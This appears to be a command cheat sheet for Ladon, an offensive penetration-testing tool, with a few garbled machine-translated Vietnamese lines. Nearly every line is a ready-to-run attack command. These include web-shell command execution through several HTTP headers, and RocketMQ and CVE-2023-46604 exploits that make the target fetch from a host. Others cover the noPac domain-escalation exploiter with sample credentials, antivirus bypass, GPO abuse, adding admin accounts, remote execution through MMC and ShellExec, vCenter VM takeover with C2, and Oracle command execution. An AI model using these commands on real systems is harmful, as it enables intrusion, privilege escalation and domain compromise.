Ladon cmdshell http://192.168.50.2:888 cmd whoami
Trình duyệt phỏng vấn http://192.168.1.8:800/shell?cmd=whoami
Ladon QueryAdminDomain
Ladon QueryDomain
Ladon MndpInfo
Ladon RouterOS
Ladon Mikrotik
Ladon PostShell<method><url><pwd><type><cmd>
Ladon PostShell POST http://192.168.50.18/post.jsp tom cmd whoami
Ladon PostShell POST http://192.168.50.18/post.jsp tom b64cmd d2hvYW1p
Ladon PostShell POST http://192.168.50.18/post.jsp tom base64 d2hvYW1p
Ladon PostShell UA http://192.168.50.18/ua.jsp tom cmd whoami
Ladon PostShell UA http://192.168.50.18/ua.jsp tom b64cmd d2hvYW1p
Ladon PostShell UA http://192.168.50.18/ua.jsp tom base64 d2hvYW1p
Ladon PostShell Cookie http://192.168.50.18/ck.jsp tom cmd whoami
Ladon PostShell Cookie http://192.168.50.18/ck.jsp tom b64cmd d2hvYW1p
Ladon PostShell Cookie http://192.168.50.18/ck.jsp tom base64 d2hvYW1p
Ladon PostShell Referer http://192.168.50.18/re.jsp tom cmd whoami
Ladon PostShell Referer http://192.168.50.18/re.jsp tom b64cmd d2hvYW1p
Ladon PostShell Referer http://192.168.50.18/re.jsp tom base64 d2hvYW1p
Ladon PostShell Destination http://192.168.50.18/re.jsp tom cmd whoami
Ladon PostShell Destination http://192.168.50.18/re.jsp tom b64cmd d2hvYW1p
Ladon PostShell Destination http://192.168.50.18/re.jsp tom base64 d2hvYW1p
Ladon PostShell HttpBasic http://192.168.50.18/re.jsp tom cmd whoami
Ladon PostShell HttpBasic http://192.168.50.18/re.jsp tom b64cmd d2hvYW1p
Ladon PostShell HttpBasic http://192.168.50.18/re.jsp tom base64 d2hvYW1p
Ladon cmd whoami
Ladon b64cmd d2hvYW1p
Ladon LoginLog
Ladon EventLog
Ladon RocketMQexp<ip>10911<command>
Ladon RocketMQexp 192.168.1.8 10911"wget http://192.168.1.8/isvul"
Ladon BypassAV py xor anyNet.exe
Ladon McpPotato whoami
Ladon Exe2Hex 1.exe
Ladon Exe2B64 1.exe
Ladon 192.168.1.8/24 ZimbraVer
Ladon http://192.168.1.8:8080 ZimbraVer
Ladon url.txt ZimbraVer
Ladon SharpGPO
Ladon SharpGPO --Action GetOU
Ladon SharpGPO --Action GetOU --OUName"IT Support"
Ladon SharpGPO --Action NewOU --OUName"IT Support"
Ladon SharpGPO --Action NewOU --OUName"App Dev"--BaseDN"OU=IT Support,DC=testad,DC=com"
Ladon SharpGPO --Action MoveObject --SrcDN"CN=user01,CN=Users,DC=testad,DC=com"--DstDN"OU=IT Support,DC=testad,DC=com"
Ladon SharpGPO --Action MoveObject --SrcDN"CN=user01,OU=IT Support,DC=testad,DC=com"--DstDN"CN=Users,DC=testad,DC=com"
Ladon SharpGPO --Action RemoveOU --OUName"IT Support"
Ladon SharpGPO --Action RemoveOU --DN"OU=IT Support,DC=testad,DC=com"
Ladon SharpGPO --Action GetGPO
Ladon SharpGPO --Action GetGPO --GPOName testgpo
Ladon SharpGPO --Action NewGPO --GPOName testgpo
Ladon SharpGPO --Action RemoveGPO --GPOName testgpo
Ladon SharpGPO --Action RemoveGPO --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8
Ladon SharpGPO --Action GetGPLink
Ladon SharpGPO --Action GetGPLink --DN"OU=IT Support,DC=testad,DC=com"
Ladon SharpGPO --Action GetGPLink --GPOName testgpo
Ladon SharpGPO --Action GetGPLink --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8
Ladon SharpGPO --Action NewGPLink --DN"OU=IT Support,DC=testad,DC=com"--GPOName testgpo
Ladon SharpGPO --Action NewGPLink --DN"OU=IT Support,DC=testad,DC=com"--GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8
Ladon SharpGPO --Action RemoveGPLink --DN"OU=IT Support,DC=testad,DC=com"--GPOName testgpo
Ladon SharpGPO --Action RemoveGPLink --DN"OU=IT Support,DC=testad,DC=com"--GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8
Ladon SharpGPO --Action GetSecurityFiltering --GPOName testgpo
Ladon SharpGPO --Action GetSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8
Ladon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --DomainUser Alice
Ladon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --DomainGroup"Domain Users"
Ladon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --DomainComputer WIN-SERVER
Ladon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --NTAccount"Authenticated Users"
Ladon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainUser Alice
Ladon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainGroup"Domain Users"
Ladon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainComputer WIN-SERVER
Ladon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --NTAccount"Authenticated Users"
Ladon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --DomainUser Alice
Ladon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --DomainGroup"Domain Users"
Ladon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --DomainComputer WIN-SERVER
Ladon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --NTAccount"Authenticated Users"
Ladon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainUser Alice
Ladon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainGroup"Domain Users"
Ladon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainComputer WIN-SERVER
Ladon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --NTAccount"Authenticated Users"
Ladon IisInfo
Ladon web 800 ldap=192.168.1.8:800
Ladon web 800 rmi=192.168.1.8
Ladon AddAdmin admin$ 123456
Ladon AddUser admin$ 123456
Ladon DelUser admin$
Tỷ như TGT thỉnh cầu /ST thỉnh cầu /AS-REP Roasting/Kerberoasting/ cắt cử công kích / hoàng kim phiếu định mức / bạc trắng phiếu định mức / kim cương phiếu định mức / ngọc bích phiếu định mức chờ
Ladon Rubeus
CVE-2021-42287/CVE-2021-42278 Scanner&Exploiter
/domain /user /pass argument neededforscanning
/dc /mAccount /nPassword argument neededforexploitation
Examples:
Ladon.exe noPac scan -domain htb.local -user domain_user -pass'Password123!'
Ladon.exe noPac -dc dc02.htb.local -mAccount demo -mPassword Password123!
Ladon.exe noPac -domain htb.local -user domain_user -pass'Password123!'/dc dc02.htb.local /mAccount demo /mPassword Password123!
Ladon.exe noPac -domain htb.local -user domain_user -pass'Password123!'/dc dc02.htb.local /mAccount demo123 /mPassword Password123!/service cifs /ptt
Ladon SharpGPOAbuse
249 SharpSphere cùng vCenter quản lý giả thuyết cơ khách thao tác hệ thống tiến hành lẫn nhau chấp hành mệnh lệnh
Ladon SharpSphere
No verb selected.
dump Snapshot and download memory dump file
list List all VMs managed by this vCenter
execute Execute givencommandintarget VM
c2 Run C2 using C3's VMwareShareFile module
upload Upload file to target VM
download Download file from target VM
help Display more information on a specific command.
version Display version information.
Ladon MmcExec host cmdline
Ladon MmcExec 127.0.0.1 calc
Ladon MmcExec 127.0.0.1 Y2FsYw==
Ladon ShellExec host cmdline
Ladon ShellExec 127.0.0.1 calc
Ladon ShellExec 127.0.0.1 Y2FsYw==
Ladon ShellBrowserExec host cmdline
Ladon ShellBrowserExec 127.0.0.1 calc
Ladon ShellBrowserExec 127.0.0.1 Y2FsYw==
Ladon 192.168.1.8/24 SmtpInfo
Ladon 192.168.1.8/24 HttpInfo
Ladon CVE-2023-46604 -i 192.168.1.8 -u http://192.168.1.1/poc.xml
Ladon DomainLog -d 7
Ladon DomainLog -h ip -d 7
Ladon DomainLog -h ip -d 7 -grep user
Ladon DomainLog -h ip -u username -p password -d 7
Ladon DomainLog -h ip -u username -p password -d 7 -all
Ladon DomainLog -h ip -u username -p password -d 7 -f user -o C:\path\res
ult.txt
Ladon LotusAdmin http://192.168.1.1
Ladon LotusAdmin http://192.168.1.1/adm.nsf
Ladon HtaSer
Ladon HtaSer 8080
Ladon 192.168.1.8/24 ConfVer
Ladon http://192.168.1.8:8080 ConfVer
Ladon url.txt ConfVer
Ladon FindAD<parameters>
Ladon pveFindADUser<parameters>
Ladon OracleCmd2 192.168.1.8 1521 orcl admin 123456 whoami
Ladon OracleCmd 192.168.1.8 1521 orcl admin 123456 m1 whoami
Ladon OracleCmd 192.168.1.8 1521 orcl admin 123456 m2 whoami
Ladon OracleCmd 192.168.1.8 1521 orcl admin 123456 m3 whoami
=======================================================
http://k8gege.org/Ladon/example-en.html
Latest version in small seal ring:http://k8gege.org/Ladon/update.txt